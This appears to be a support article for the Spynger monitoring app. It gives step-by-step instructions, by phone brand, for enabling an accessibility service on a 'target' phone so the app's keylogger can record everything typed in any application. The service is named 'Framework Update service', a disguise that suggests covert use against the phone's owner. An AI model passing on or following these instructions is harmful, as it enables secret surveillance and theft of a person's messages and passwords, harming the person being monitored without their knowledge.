To resolve the issue, please follow these steps on the device you are monitoring:
- For Samsung (Android less than 8), Sony Xperia and most Android devices of other brands: go to Settings -> Accessibility -> and enable “Framework Update service” (make it switched on). If it is already on, make it switched off and turn it on back again.
- For Huawei Devices: go to Settings -> Smart Assistance -> Accessibility -> and enable “Framework Update service” (make it switched on). If it is already on, make it switched off and turn it on back again.
- For target Xiaomi Devices: go to Settings -> Additional Settings -> Accessibility -> and enable “Framework Update service” (make it switched on). If it is already on, make it switched off and turn it on back again.
- For Samsung devices with Android version higher than 8: go to Settings -> Accessibility -> find the option ‘Installed Services’ and enable “Framework Update service” (make it switched on). If it is already on, make it switched off and turn it on back again.
Once you finished, log into your Spynger account and locate the Keylogger tab in the list of tabs on the left-hand side. Once typing activity is detected on the monitored phone within any application, the setup instructions under the Keylogger tab will automatically vanish, and you'll promptly begin to view the captured information.
